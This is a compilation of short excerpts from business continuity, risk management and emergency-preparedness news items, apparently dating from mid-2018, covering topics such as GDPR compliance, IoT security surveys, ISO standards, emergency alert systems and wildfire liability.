When the first National Night Out was held in 1984, more than 2.5 million citizens organized to give recognition to their local police forces. By 2016, the annual event had grown to include more than 38 million Americans across 16,000 communities. National Night Out celebrates police officers and provides an opportunity to thank them for the critical protection and services they so bravely provide. It’s the perfect occasion for citizens to get to know members of their town’s police force on a first-name basis, and vice versa.

While festivities vary by community (and many Texas towns choose to celebrate on the first Tuesday of October), National Night Out events often include block parties, parades, concerts, and cookouts, making it a family-friendly event enjoyed by people of all ages.

Emergency personnel are on hand to give safety demonstrations, explain their jobs to children, and talk about drug prevention and anti-crime initiatives in a relaxed, casual environment.



The Value of a “Built In” vs. “Bolted On” E&C Program


Ethics and compliance are far too often neglected by boards of directors at big firms, even though it’s settled law and policy that boards of directors are required to oversee company compliance. In fact, a survey of 26 past and present Chief Ethics and Compliance Officers (CECOs) reveals that most CECOs feel their boards don’t fully understand the ethics and compliance programs they should be overseeing and that they ask too little of senior management when it comes to ethics.

It seems like ethical failures in major companies are in the headlines on an almost daily basis. Sexual harassment and abuse, toxic workplace cultures, retaliatory firings against those who speak up – the list goes on and on. And after each new case, one of the first and most crucial questions is, “Where was the board?”

While it’s settled law and policy that boards of directors are required to oversee company compliance with law and regulation, it seems that ethics and compliance are far too often neglected by the boards of big firms. The failure of proper E&C oversight can have far-reaching consequences, as the basic function of ethics and compliance can be tied directly to one of the central concerns of a board: value and reputation.

To foster an understanding of how boards engage with ethics and compliance, we at LRN turned to 26 past and present Chief Ethics and Compliance Officers (CECOs) of major global companies for in-depth interviews on the role and impact of boards. We learned most CECOs feel that boards do not fully understand the E&C programs they’re supposed to be overseeing and spend limited time on these programs while requiring too little from senior management when it comes to E&C.



(TNS) — When he was home for lunch Monday, Dennis Wagner, director of engineering for the town of Windsor, got a phone call from an unknown number so he decided not to answer.

When he checked his voicemail, he discovered it was a reminder from Weld County to sign up for emergency alerts, if he hadn't already. Of course, Wagner said, he has, because it's one of the best ways to learn if any harsh weather is expected to hit Windsor.

The old method — outdoor warning sirens — seems pretty outdated, he said.

Other Windsor officials agree, as do those in Greeley. After the mile-wide, 2008 tornado that hit Windsor and other parts of Weld County, Windsor residents have wondered on social media and at town events — like this year's commemoration of the 10-year anniversary of the tornado — why the town hasn't chosen to put sirens in place.



We’ve all been there at some point during our lives: locked out of the house or car because we’ve lost or forgotten our keys (and it always seems to happen when we’re already running behind!). But as frustrating as the situation is, the good news is it’s usually short-lived—once we have our spare key in hand, we’re back in business. But what happens when it’s a key member of your team who’s been lost or sidelined? Do your business continuity management plans account for that?

A strong and focused business operations plan includes the identification of key personnel as well a succession plan for those essential people. In addition, a successful Business Continuity/Disaster Recovery (BC/DR) plan must identify the key recovery personnel and critical responsibilities to be addressed in the event of a business disruption. If some of the key personnel cross over between business operations and the BC/DR team, then it’s even more important to be confident you have all your bases covered.



Where cybercrime is concerned, it’s not whether an organization will be attacked, it’s when.

Juniper Research reports that cybercrime costs globally will exceed $2.1 trillion by 2019. That is four times the cost of data breaches in 2015. By 2020, a single cybersecurity breach will cost more than $150 million.

How organizations respond to cyber-attacks and other emergencies can help mitigate any damage and make the recovery process more efficient.



I love metrics, as any regular reader of this blog knows. I think they are the only way to obtain a clear, objective view of the health of a business continuity management (BCM) program and the ability of an organization to recover from a disruption.

But metrics aren’t an end in themselves, obviously. They are a means to an end. Their real value lies in the fact that you can use them to improve the state of your BCM program.


I take it for granted that metrics can help you strengthen your BCM program because I have seen it happen so many times.

However, it occurred to me that a lot of business continuity professionals might have only a vague idea of how to go about leveraging metrics in this fashion.

For that reason, I decided to devote today’s blog to the topic.



With remote working on the rise, how do we ensure we’re communicating effectively with others, through good old-fashioned conversation? Alison Coleman reports

Digital technology has transformed the way that we communicate at the expense of face-to-face communication. As psychologist Susan Pinker says in her book, The Village Effect, “In a short evolutionary time, we have changed from group-living primates skilled at reading each other’s every gesture and intention, to a solitary species, each one of us preoccupied with our own screen.”

Nowhere is this more evident than in the modern workplace, where employees – particularly the growing numbers of remote and mobile workers – are increasingly reliant on email, texts and instant messaging to interact with their colleagues. And with a Cancer Research UK study revealing that Millennials (who will represent 75% of the workforce by 2030) are shunning face-to-face conversation in favor of chatting online, it’s a trend that looks set to continue.



Tuesday, 31 July 2018 14:36

Why it’s good to talk

We talk a lot about the need to mitigate the operational risks of a business disruption: what if your organization loses access to a key facility or suffers a ransomware attack or experiences the loss of a critical vendor?

Those of us who work in business continuity and IT/disaster recovery think about these kinds of problems night and day—and we work hard to create plans to mitigate the risks of them happening and to manage the impact if they do.

However, there is one kind of impact that is quite significant but frequently overlooked: the financial impacts which a business disruption can cause the company.



(TNS) — When a blistering heat wave struck the Southland earlier this month, the region’s electric grid was so overwhelmed that more than 100,000 customers in Los Angeles had at some point lost power. Some went days without electricity.

Now, as Southern California endures another round of scorching heat that forecasters expect will shatter daily records in some areas on Wednesday, utility officials are hoping to avoid similar chaos by staffing extra workers and imploring residents to ease up on their thermostats to give the aging power system a chance to cool down.

“It’s similar to running your car at 100 mph, nonstop,” said Los Angeles Department of Water and Power spokesman Joe Ramallo, referring to those who blast their air conditioning day and night. “Eventually, you’re going to have some problems. Distribution equipment is like that — it needs a break.”



Cybercrime tops the list of the most dangerous risks for insurers in Willis Re’s midyear review of issues likely to keep insurance executives up late at night.

Specifically, the most omnipresent cybersecurity problems to date are Meltdown and Spectre, two hardware vulnerabilities built into the chips of almost every server, computer and mobile device.

Not far behind is the threat of falling into the information technology gap. Most insurers surveyed by Willis have just completed, are in the middle of, or are planning a major IT systems overhaul. They report a concern surrounding the expense of constant updates and at the same time the risk of not being able to satisfy customer service expectations by falling behind on the latest upgrades.



One of the biggest challenges a business faces during a wildfire is communication. Wildfires can grow from a small brush fire into an inferno that engulfs thousands of acres in only a matter of hours.

As a result, officials must be on their toes and have the right technology, processes, and training in place to ensure that those in harm’s way are given the information they need to protect themselves and their loved ones at a moment’s notice.

Some of the most memorable wildfires in the U.S. were the horrific California wildfires of 2017.

Wildfires hit Sonoma County especially hard. Even though officials evacuated 100,000 people, 24 people still died.

The Sonoma Assessment Team evaluated the emergency notification process and response to these fires and found there was an established public alert and warning system to alert residents and visitors to the county.

In fact, alerts began the night the fire broke out.



Albert Einstein once stated “The important thing is not to stop questioning. Curiosity has its own reason for existing.” As a recent college graduate, this quote has helped influence my decisions in college and starting a career. I was always very quiet and did not like being outside of my comfort zone…until recently…my curiosity helped me step out of my comfort zone. Being curious and confident was the reason why I graduated in the field of Information Science Technology (IST), and why I chose to intern at BC in the Cloud.

While in college, I faced many important decisions in my life. When I started my freshman year at Penn State I wanted to be a computer scientist and develop software. I’ve always had a great passion in technology and thought this field would be great. It took me about two years to realize that I was losing interest in computer science, the course materials were overly complicated and lacked excitement. But I didn’t want to stop pursuing my passion in technology. Stuck, I felt wondering if I should stay in this field. Then a friend told me about a major called Information Science Technology (IST). What he told me blew my mind because I could learn and enjoy development without taking excessively complex engineering courses. IST breaks up into two sections: Integrations and Application, and Design and Development. Also, this major does not just provide development courses, but courses in networking, telecommunication, cyber security and project management. After learning about this, I became curious, but also afraid. I was afraid that if I decided to change my major, people would think of me as a person who only just works on computers (IT guy stereotype). I ended up following my curiosity and studied IST. And I don’t regret it at all.



In today’s constantly moving and changing world your community needs a mass notification system.

How else will you quickly reach your residents with warnings or instructions during a pending storm? An active shooter scenario? A flash flood across a major highway?

Once a system is purchased, the key to success?  Implementation.  A well-considered implementation will lay the foundation for how effectively the system will operate during a crisis.  Check out these five pro tips for a smooth and stellar implementation.



Applying the Standard for Independent Contractors

California has adopted a new ABC test for determining whether a worker should be classified as an employee or an independent contractor. This new multifactor test has sent shockwaves across employers statewide, and its tricky application has some reeling. Between the new test and questions about retroactivity and joint employer applications, employers should use caution and evaluate their independent contractor relationships.

The “ABC test” recently adopted by the California Supreme Court in the Dynamex Operations West, Inc. v. Superior Courtcase is now touted as the best way to make the distinction between an “exploited employee” and an “entrepreneur.” The court’s adoption of the ABC test for determining whether an employee should be classified as an employee or independent contractor has sent shock waves to businesses that have relied in the past upon a flexible, multifactor common law test where none of the individual factors, taken alone, are necessarily controlling.



We all know that retaining loyal, happy customers is the key to any successful business, but the fickle consumer world is not always easy to please. A series of guidelines has just been published, bringing together international best practice on customer satisfaction.

From handling complaints to service with a smile, taking care of customers is a science in itself and one not to be taken lightly as it can have a dramatic effect on both staff morale and the bottom line. Studies abound that show that those companies that perform well in customer experience have higher revenues and returns on investments. Not to mention that most customers don’t go back to a company if they have a bad experience.

Getting the customer experience right, then, is imperative. A series of international standards dedicated to improving customer satisfaction has just been updated, to ensure the information is most relevant and reflects revisions to ISO’s flagship standard for quality, ISO 9001.



The Industrial Internet of Things (IIoT) has opened many security concerns, confusion about what constitutes an endpoint and unrealistic perspectives on protecting systems and data, according to the 2018 SANS Industrial IoT Security Survey report.

More than half of those taking the SANS survey reported that the most vulnerable aspects of their infrastructure are data, firmware, embedded systems or general endpoints. At the same time, respondents indicated that the debate continues over the definition of an IIoT endpoint.

"The discrepancy in defining IIoT endpoints is the basis for some of the confusion surrounding responsibility for IIoT security," according to Doug Wylie, Director of the Industrials & Infrastructure Business Portfolio at SANS Institute. "Many practitioners likely are not adequately identifying and managing the numerous assets that in some way connect to networks and present a danger to their organizations. For this reason, it is important for company IT and OT groups to agree to a common definition to help ensure they adequately identify security risks as they evolve their systems to adapt to new architectural models."

The survey uncovered other potential endpoint issues. For example, only 40 percent said they apply and maintain patches and updates to protect IIoT devices and systems, and 56 percent noted difficulty in patching as one of the greatest security challenges. Almost 40 percent said identifying, tracking and managing devices represented another significant security challenge.

Finally, the survey unveiled big gaps between the OT, IT and management perceptions of IIoT security. Only 64 percent of OT departments reported being somewhat-confident or confident in their ability to secure their IIoT infrastructure, as opposed to 83 percent of IT department respondents and 93 percent of company leaders.


Are you truly prepared to help steer your business through a major disruption?

Consider the range of threats that can affect your business continuity:

  • Power loss
  • Natural disaster such as a hurricane, wildfire or major blizzard
  • Cyberthreat
  • Active shooter scenario
  • Pandemic

Any one of these threats – and others – can disrupt your business. And then what? You need a business continuity plan (BCP) that helps get your business back on its feet as quickly as possible. You cannot afford to waste time determining how to react during and after a threat, because ceasing operations can be catastrophic.

Your business continuity plan should help protect your company against threats and help you recover from them. Be sure your BCP is effective by signing up for our free upcoming webinar, 30 Business Continuity Best Practices in 30 Minutes. This quick presentation provides you dozens of best practices to help navigate a major business disruption.



Nick Sacke discusses the issue of IoT security and how concerns around it are a priority for organizations when it comes to deploying IoT services, especially when using existing networks that are known to be vulnerable.

Security takes priority when it comes to the development and deployment of IoT, with Gartner predicting that by 2020, IoT security will make up 20 percent of annual security budgets. As a potential inhibitor, analysts, vendors and stakeholders alike are concerned about the potentially significant security risks associated with IoT deployments. These concerns are playing a role in decision-making and end user confidence in deploying IoT services, particularly when it comes to utilising existing networks that are known to be vulnerable, for example, Wi-Fi, and those that are new and operate in the unlicensed spectrum, such as LoRaWAN and Sigfox. Standardization, or lack of, within the IoT industry is also acting as a barrier to deployment, with older and newer networks deploying IoT, more standardization regarding security policies is urgently required.

One issue undermining user confidence is the lack of information regarding the security arrangements already in place for networks underpinning IoT, both the licensed and unlicensed variants. Low Power WAN (LPWAN) technology platforms such as LoRaWAN and Sigfox use unlicensed spectrum to deploy IoT sensors at scale and it’s been heavily reported that such network types lack the traditional security mechanisms of cellular networks, with carriers talking about a cellular based IoT network being ‘more secure’ as traffic on these network types is within the control of the respective carrier.

To tackle the argument, it is important to make the distinction between the types of sensor traffic that is passed over these networks, and how security can be applied at various points in the network. For example, all the traffic that runs through a LoRaWAN network of sensors is non-IP protocol based, has business grade 128-bit encryption, and requires decryption via an application server that sits in a private cloud environment. This contrasts favourably with Wi-Fi based sensor networks that may be interfacing to public internet connections, that require very stringent security requirements locally at site.



Tuesday, 24 July 2018 15:01

IoT security: an overview of the issues

Downtime has been a bugbear for organizations every since IT systems first started to be used, but according to a University of Chicago study, the causes of downtime are still often unknown. Doron Pinhas asks why this is still the case and looks at improvements that can be made.

Benjamin Franklin said: “Three may keep a secret, if two of them are dead.” Yet there are apparently some secrets time hasn't revealed – yet.  One thing we haven't figured out is why service outages occur! A study by the University of Chicago, listing the usual reasons one would expect to see for outages concludes that the biggest reason for outages is – ‘unknown’.

That's especially telling, since IT activities, one would presume, are recorded in log files, and lend themselves to analysis. The study examined hundreds of service outages at companies that provide services via the cloud. And while the ‘usual suspects’ - bugs, upgrades, network or power issues, etc. - figured significantly, ‘unknown’ was still the single largest reason reported by IT administrators for outages. Meaning that even after a thorough, even forensic investigation, they couldn't figure out what caused the outage.

That's unacceptable, because outages can cost companies millions, and without knowledge of what caused an outage, there is no way to know how to prevent the next one.



New IAPP and TrustArc research uncovers technology use among global businesses to address new privacy and data protection challenges.

Singapore (July 23, 2018) — TrustArc, the leading data privacy management company, and The International Association of Privacy Professionals (IAPP), the world’s largest global information privacy community, today announced at the 2018 IAPP Asia Privacy Forum the results of new research that examined how privacy technology is bought and deployed to address privacy and data protection challenges. Surveying privacy professionals worldwide, the findings of the survey show that privacy management technology usage is on the rise across all regions and that privacy teams have significant influence on purchasing decisions for eight of the 10 technology categories surveyed.

“This global survey is critical in our efforts to better understand how privacy professionals are addressing  compliance challenges and the technologies that are being deployed now and in the near future,” said Chris Babel, CEO of TrustArc. “Though security budgets remain larger, we’re seeing a marked shift in privacy teams’ influence over technology purchasing decisions. This trend confirms what we’re seeing among our customers — that they have a growing need for technology solutions to help them manage privacy compliance at scale on a global basis.”

The EU GDPR and other global and domestic legal reforms, combined with technological advancements, have made the task of operationalizing privacy and data protection vastly more complicated. Businesses now must account for how data is entering the organization, how it is being used, what permissions are attached to it and who has the responsibility for managing it. To address these challenges, the demand for privacy technology continues to grow rapidly.



(TNS) - Nearly 10 months after wildfires ravaged the North Bay, a high-stakes legislative tug of war is underway in Sacramento, where the governor, state lawmakers, utilities, local government officials and fire survivors are battling over who pays for at least $10 billion in damages.

As Santa Rosa and other fire-stricken communities struggle to rebuild, Pacific, Gas & Electric is lobbying hard for a limit to the financial liability of California electric utilities in the destructive wildfires expected to result from a warmer, drier California climate.

Though Gov. Jerry Brown and legislative leaders have said they won’t retroactively change liability laws for the 2017 fires, groups representing fire survivors, trial attorneys and county governments have voiced opposition to any immediate change in liability policy.



Storytelling. Why It’s Become a Buzzword in Business

From international companies like Nike, Microsoft and IBM, to small startups, many organizations now employ Chief Storytellers as part of senior management, a move that makes a lot of sense. The business of selling has grown more complicated and competitive requiring new methods of communication to engage customers. Ironically the “new” method of using storytelling as a marketing tool has been around for millennia and is part of our collective DNA. Just ask any cave person who ever sat around a camp fire and became mesmerized while listening to a hunter recount the story of a giant mastodon that got away that day.

In the same way that the cave guy’s story of the hunt fascinated his listeners and fired them up to try again for that escaped mastodon, Chief Storytellers today also build an emotional connection between a product or brand and their customers. Like the cave guy, they too persuade people to take actions: Love us, stay loyal and continue buying our products.



According to ISO, risk is defined as the effect of uncertainty on objectives, focusing on the effect of incomplete knowledge of events or circumstances on an organization’s decision- making. For companies that have accepted this definition and are looking to mature their risk programs and enable a risk culture, ISO 31000’s risk management framework is a great place to start. The ISO 31000 principles can help these organizations score the maturity of their risk processes and culture. 

Technology is a critical element of implementing effective risk and decision-making practices because it bridges the communication gap between teams, breaks down departmental silos, facilitates collaboration and information access, and automates tedious tasks. Great technology can’t make up for bad practice but without it, no program will meet the ISO 31000 principles. 

ISO 31000 delivers a clearer, shorter and more concise guide that will help organizations use risk management principles to improve planning and make better decisions.”

To explain how Resolver believes risk technology can help organizations match ISO’s vision, we break down the 11 principles into groups and share our insight:



4 Next Steps

With the European Union’s General Data Protection Regulation (GDPR) deadline now behind us, the real work of maintaining ongoing compliance begins. In this article, Gartner’s Stephanie Quaranta outlines the actions privacy and compliance executives should take for the rest of 2018 and into next to ensure the effectiveness of GDPR-related changes.

The past two years have been busy ones for privacy and compliance executives. The formation of the General Data Protection Regulation (GDPR) in April 2016 gave organizations just over two years to understand the requirements, conduct a gap analysis and create and execute a plan for bringing their organizations into compliance.

Since then, privacy and compliance executives have led the charge in appointing Data Protection Officers, building out data protection impact assessment processes, revisiting breach requirements and much more. After two years spent focused on preparing their organizations for the May 25, 2018 implementation deadline, privacy and compliance executives are finally able to pick their heads up and take stock of the changes made. But now they are left to wonder: what’s next?

Though there is no one right answer to that question, there are four areas most organizations will want to invest in between now and 2020 to maintain ongoing compliance.



Monday, 23 July 2018 14:12

You’re GDPR Compliant … Now What?

I’ve seen many definitions of the term “data science.” I think it is best summed up as the art of studying data and pulling insights out of it that can practically benefit your business and bottom line.

That’s fine, you might be thinking. But why are you talking about data science in a blog dedicated to business continuity and IT/disaster recovery?

The answer is, because one of the areas where data science can help you is in business continuity and IT/disaster recovery.



On 30th March 2019, the United Kingdom will leave the EU and the possibility of there being no agreement in place between the UK and the EU seems to be increasing. In response, the EU has warned companies to start planning for this scenario.

In a European Commission Communication which was adopted on 19th July, the Commission states:

“While the EU is working day and night for a deal ensuring an orderly withdrawal, the UK's withdrawal will undoubtedly cause disruption – for example in business supply chains – whether or not there is a deal. As there is still no certainty that there will be a ratified withdrawal agreement in place on that date, or what it will entail, preparations have been ongoing to try to ensure that the EU institutions, Member States and private parties are prepared for the UK's withdrawal. And in any event, even if an agreement is reached, the UK will no longer be a Member State after withdrawal and will no longer enjoy the same benefits as a member. Therefore, preparing for the UK becoming a third country is of paramount importance, even in the case of a deal between the EU and the UK.

“Having said that, preparing for the UK's withdrawal is not only the responsibility of the EU institutions. It is a joint effort at EU, national and regional levels, and also includes in particular economic operators and other private parties – everyone must now step up preparations for all scenarios and take responsibility for their specific situation.”

An accompanying fact sheet spells out the situation more starkly, stating that: "It is now urgent that businesses in the EU start preparing for the UK’s withdrawal, if they have not yet done so ... all businesses concerned have to prepare, make all necessary decisions, and complete all required administrative actions, before 30 March 2019 in order to avoid disruption."

In an annex to the Communication, the European Commission published a list of areas which may be impacted by Brexit and which need to be considered in Brexit contingency planningRead the list here (PDF).

(TNS) - A scrambled voice fills the room sounding like someone trying to talk under water intermixed with variable modulated frequency sounds one might hear from a music keyboard synthesizer.

A person sits behind a radio carefully moving a silver control knob with his fingers to find just the right radio frequency making the scrambled talk into a voice he can understand.

The person is a member of the Clay County Area Amateur Radio Club, which participated recently in a national Amateur Radio Relay League Field Day at the Emergency Management Operations Center in Flora.

During the early morning hours of June 23, club members set up several different sizes of antennas to use with their radios to cover a wide range of frequencies for emergency communications.



Friday, 20 July 2018 16:13

Ham Radio Club Prepares for Disaster

Ensuring the Effectiveness of a Risk-Based Audit Plan

Protiviti’s Jim DeLoach explores how to bolster internal audit’s efforts in providing recommendations that are strong, actionable and in keeping with the board’s expectations.

We’ve always believed that boards should ensure that their organizations maximize the full potential of internal audit. There are four C’s directors should consider when evaluating the sufficiency of any risk-based audit plan: culture, competitiveness, compliance and cyber.

We’re not suggesting they are the only things a board should consider, but they should be on the board’s radar.

In 2015, the world’s largest ongoing study of the internal audit profession – the Global Internal Audit Common Body of Knowledge (CBOK) – was conducted by The Institute of Internal Auditors (The IIA) and Protiviti to ascertain expectations from key stakeholders, including board members, regarding internal audit performance. There were several imperatives for internal audit gleaned from the directors participating in the CBOK Stakeholder Study, which is conducted every five years. Among them: Focus more on strategic risks, think beyond the scope of the audit plan and add more value through consulting.



(TNS) - The Owensboro-Daviess County, Ky., 911 board on Tuesday discussed a potential upgrade to the county's weather siren system that officials say is needed.

John Clouse, deputy director of Daviess County Emergency Management, told board members the current siren software needs replacing because it is no longer being supported by the vendor.

"There are no further upgrades from the company" to patch problems with the software, Clouse said. Because of that, three sirens in the county have had software failures, making them no longer able to "communicate," and inform officials as to whether or not they are working.



While many business continuity plans focus on the effects of an incident rather than the cause, Richard Duncan explains why terrorism response may be a special case requiring a different and more proactive approach.

Here in the UK we have seen our fair share of terror events, that have had a serious impact on all aspects of our lives, including companies that have found themselves directly affected, or found themselves within the wider emergency response cordon, or indeed had their business activity seriously curtailed during the investigative process that follows. The latter can place restrictions on the use of areas of the business until those investigations are concluded.

All this external activity needs a response and yet organizations, in my experience, generally do not consider within the business continuity plans how they will respond. For example: who will liaise with the emergency responders? What role will the organization be expected to play in the response and recovery phases? Has the crisis management team (CMT) received training in business continuity considerations when the business has been affected by a terrorist incident?

I believe that the first step in the process as a 'baseline' should be to consider how the organization plans for its response to each of the five UK terror threat levels, in terms of asset and personnel security and secondly, how to provide the CMT with immediate guidance on what needs to be done from a strategic, tactical and operational perspective, if the business is unfortunate enough to be caught up in an attack. That guidance should be task orientated and needs to consider all aspects from the customer facing staff right up to the strategic management of the organization.



Revision is ongoing for ISO 22000 on food safety management systems, which has just reached the Draft International Standard (DIS) stage. The revised standard will incorporate a new core structure as well as recognized key elements to ensure food safety at every step of the food chain.

The ISO 22000 revision aims to consolidate the most recent issues surrounding food safety to suit the current landscape of the food sector. It is a very comprehensive process and the working group revising the standard has covered several extensive concepts. The experts met three times in 2016 and processed 1 800 comments from a variety of global stakeholders representing a broad range of positions. Now, their main task is to translate the revised concepts included in the standard and communicate these to the users in a clear and concise manner that makes ISO 22000 easier to understand and implement for organizations of all sizes, in every aspect of the food chain.

The new version of ISO 22000 will contain a number of minor alterations that have been introduced to increase the readability and clarity of the standard, as well as some substantial changes that are more structural in nature. The main highlights are as follows:



Training for boards jumps by nearly 30 percent compared with 2017 findings, but major training gaps persist despite a volatile ethics and compliance environment

PORTLAND, OR – Leading ethics and compliance software and services company NAVEX Global® today announced the release of findings from its 2018 Training Benchmark Report. In the wake of a series of high-profile sexual harassment scandals in recent months, organizations have adjusted their training programs – and are providing more training to boards of directors.

The report, now in its fifth year, is based on survey responses from more than 1,200 ethics and compliance professionals globally. Seventy-three percent of respondents said they train their board members, up from 44 percent in 2017 and 58 percent in 2016. This shift reflects a major positive trend for organizations and demonstrates an increasing awareness of their obligation to keep directors apprised of ethics and compliance risks. Recent reputation-damaging events have heightened awareness around the need to educate directors – but the survey reveals that major gaps persist as directors are not fully educated on the most pressing risks.



For organizations, social media is the new Wild West: There is no sheriff, vigilante justice is the order of the day, and things can get very crazy very quickly.

If you don’t believe me, just ask Papa John’s, Starbucks, and United Airlines.



The bad behavior of one or two employees, amplified through the bullhorns of Twitter, Instagram, and Facebook, can snowball in a way that threatens a brand that took years to build. Suddenly, instead of being the pizza chain that loves football, the community-minded coffee chain, or the airline that offers something special in the air, your organization might become known as the one with the racist chairman or managers, or the one that dragged a paying passenger off an overbooked flight.

Sometimes social media calls attention to behavior that truly is wrong and should be publicized and corrected.



Following our recent acquisition by InterVision, we’ve been positioned in 2018 Gartner Magic Quadrant for Disaster Recovery as a Service for the third year in a row.

According to the Gartner, “The biggest changes for 2018 materialized in the form of evolved inclusion and exclusion criteria, and even greater emphasis on the “value for money” when it comes to support for heterogeneous platforms.” The report is designed to answer the question, “If I want DRaaS and only DRaaS, which providers are the most relevant?”



The best products and services leverage their data to its fullest. Depending on the application or service, data is collected when and where it’s generated. Media is generated on the production site, IoT data near its infrastructure, Research data near the instruments, etc. Getting that data to the public cloud enables further data processing, machine learning or distribution.

It’s in these workflows that we want to collect a *lot* of data, but we may not want to move all the data to a compute-intensive location like the public cloud. This is why we have introduced metadata tagging with SwiftStack 1space.

With SwiftStack 1space, we can create a set of tags that will trigger data movement between on-premises and public cloud storage resources.



In order to effectively transform business ideas into actions, you need a plan. A quality plan. Guidance on how to create one has just been updated, providing a powerful tool to complement any quality management system, including ISO 9001.

Producing something – whether it be a product, service, process or project – always involves a series of interconnected or complementary processes and tasks that have to be performed, and planning them effectively in advance often leads to better results. A quality plan helps organizations do just that, as it includes a specification of the actions, responsibilities and associated resources that are needed to achieve the desired outcomes. It is useful as it describes how an organization will actually go about producing the product or service and how these actions can have an impact on other processes or parts of the business.  It is a particularly useful tool for validating new products, services or processes before the work begins and for demonstrating to stakeholders how their requirements are going to be met.

ISO 10005:2018, Quality management – Guidelines for quality plans, gives guidelines for establishing and applying quality plans, and it has just been updated to provide more guidance and more examples to be relevant to organizations of all shapes and sizes.

Roy Ackema, Convener of the working group that updated the standard, said that while it is not essential to have in place ISO 9001, ISO’s flagship standard for quality management systems, in order to benefit from the guidance of ISO 10005, the two standards are based on many of the same concepts and principles, making them highly complementary to each other.



Wednesday, 18 July 2018 15:34

Guidance on quality plans just updated

(TNS) — After rejecting the idea several years ago, Columbus, Ohio, now could have a gunshot detection system in place in three neighborhoods by the end of 2018.

Mayor Andrew J. Ginther announced on Monday that the city plans to roll out a yearlong pilot program with California-based ShotSpotter to install sensors in the Hilltop, Linden and the South Side neighborhoods.

Ginther announced that the city had decided to use ShotSpotter for the pilot during a news conference Monday to update the public on progress made on the Comprehensive Neighborhood Safety Strategy, a plan the city began last year to reduce violent crime.



Food is a passion of mine. I will eat pretty much anything – from cricket fried rice to a Bloody Mary topped with two Cornish hens, an avocado and fried okra to anything and everything with bacon. I love food!  When I travel to industry conferences, I make it a point to hunt out at least one unique restaurant for one of my meals. My latest obsession – José Andrés restaurants. José Andrés is a James Beard awarding winning chef with 29 restaurants. My current favorite restaurant of his is called Bazaar, where you can enjoy an amazing 18 course culinary experience. OMG it’s the absolute best, if you ever get a chance to try it…TRY IT!

So, what does all this amazing food talk have to do with business continuity or disaster recovery? Recently I found out it has a lot to do with disaster recovery.  Let me explain… We always look immediately to the big organizations like FEMA and Red Cross to help support relief efforts. But, in reality, they can’t do it all. There is only so much food, supplies and volunteers to go around. That is why there are many other organizations (probably lesser known, but still very effective) that assist in supporting disaster relief.  One of those organizations is called World Central Kitchen (WCK), which the chef that I speak so highly of, José Andrés is a major contributor of.



Tuesday, 17 July 2018 05:29

What does food have to do with it…

Driving Change to Improve Resilience and Agility

Enterprise risk management (ERM) is a framework organizations use to manage risks and seize opportunities related to the achievement of their objectives. More and more frequently, upper-level management refuses to acknowledge ERM properly, which leads to missed opportunity and lost revenues. Read more to find out what world-renowned entrepreneur Peadar Duffy has to say about ERM and its business implications.

ERM is Dead!

I spent a couple of hours talking with the senior independent director of a major FTSE recently. He opined that in his experience, risk management consistently fails to deliver value. It is led by people who are more administrators than leaders, and more bureaucrats than doers. The SID in question has himself been a spectacularly successful CXO in a number of significant organizations.

Around the same time, another senior executive with impressive credentials remarked that in his experience, “risk has been done to him” by folk in risk management. He speaks of the parallel universes of the operational front lines, risk support and audit. Whereas the theory and rationale (three lines of defense) is sound, the method of execution is often suboptimal and sometimes even counterproductive.

I am sympathetic to these perspectives, as I think that whilst harsh, they are representative of generally held opinions of many in both front-line decision-making and strategic leadership positions.



Tuesday, 17 July 2018 05:29

ERM Is Dead! Long Live ERM!

In our hyper-connected, technology driven world, data breaches and cyber-attacks remain a significant threat to organizations, and a lack of awareness of the risks is often to blame. A newly revised standard will help.

Protecting the security of a company’s information – whether it be commercially sensitive or the personal details of their clients - has never been more under the spotlight.  New legislation such as the European GDPR means organizations are under even greater pressure to ensure their information is secure.  But having the most appropriate technologies and processes can be a minefield. The newly revised ISO/IEC 27005:2018, Information technology – Security techniques – Information security risk management, provides guidance for organizations on how to wade through it all by providing a framework for effectively managing the risks.

Complementary to ISO/IEC 27001:2013, which provides the requirements for an information security management system (ISMS), ISO/IEC 27005 has recently been updated to reflect the new version of ISO/IEC 27001 and thus ensure it is best equipped to meet the demands of organizations of today.



Why an Evolved Security Strategy is Critical

Jordan Mauriello, Chief Technology Officer of Critical Start, discusses how the operational model of legacy managed security service providers (MSSPs) can actually leave organizations more vulnerable to cyberattacks, increasing the risk of security breaches and potential compliance issues.

Today’s Security Landscape

Today, the number of cyberattacks is on the rise. According to a 2017 report from Accenture, there are more than 130 large-scale, targeted breaches in the U.S. per year, and the number is growing 27 percent annually. As a result, distributed enterprise IT environments are facing more complex threat landscapes. Threat actors and hackers are continually evolving their techniques and using new machine-generated attacks on a daily basis. With all this change, it can be extremely difficult for small enterprise security teams to keep up with the volume of alerts from their sprawling security infrastructure.



What Boards Should Know

As corporate scandals hit the headlines, boards of directors must often answer questions about their own engagement and oversight. Could they have known more sooner? With just a few attorneys directing search experts in an investigation of small collections of data, a preliminary micro-investigation can help provide directors with an answer to the question, “do we need to be worried about this?”

Every day, it seems like a new corporate scandal is splashed across the headlines, inevitably leading to questions (and often lawsuits) about who knew what, when. Forced to react, directors often must answer questions about their own engagement and oversight. Would greater board intervention earlier have been appropriate? This question often leads to discussion of the tools available to the board if it wants to test the quality and completeness of the information it may (or may not) be receiving from management.

Risk oversight is a hot button issue, and both investors and boards are paying attention. According to a 2017 survey by PwC, over 40 percent of directors polled responded that they would like their boards to spend additional time and resources on risk assessment and management.[1] Large institutional investors are also focused on risk oversight and risk related topics, with groups like Vanguard identifying risk oversight as one of four key pillars for effective corporate governance.

Yet the challenge for many boards is deciding if, when and how to scale up their oversight incrementally in response to rumors, suspicion or isolated reports that might not alone warrant a formal board or audit committee investigation with the attendant costs and disruptions.



How much should your organization spend on business continuity and IT disaster recovery? And how do you find out if it being spent in the right areas to really make the organization resilient? Mark Saville and Mark Smith explain how a technique borrowed from the way that high-hazard industries manage risks can help.

In May 2018, Airbnb was valued at $38bn (£28bn), significantly higher than the top rated hotel brand, Hilton Hotels at $24bn (£18bn). The leverage of assets, mainly intangible is having a major impact on how businesses are valued. The use of data, and ensuring its integrity, is the differentiating intangible asset in 2018.

The exploitation of data is a huge multiplier, and with cloud computing the barriers, are reducing, allowing easier access to what were once expensive IT resources. As a result, more companies can take advantage of IT, and gain business insight from data.

If the use of data can create such value, how much should an organization spend to maintain the security, integrity and availability of its data and the supporting IT infrastructures?

